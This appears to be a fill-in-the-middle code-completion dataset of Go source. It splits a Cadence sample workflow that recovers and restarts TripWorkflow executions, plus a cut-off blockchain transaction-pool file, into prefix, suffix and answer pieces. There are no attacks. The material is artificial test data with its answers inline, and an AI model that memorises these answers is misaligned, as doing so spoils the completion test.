logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
return nil
}
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil |
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
}
func extractSignals(events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
}
| {
return err
} | conditional_block |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
return nil
}
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil {
return err
}
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) |
func extractSignals(events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
}
| {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
} | identifier_body |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
| }
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil {
return err
}
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
}
func extractSignals(events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
} | return nil | random_line_split |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) |
func (pool *TxPool) refreshWaitPool() {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch {
pool.TxEnqueue(ch)
}
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
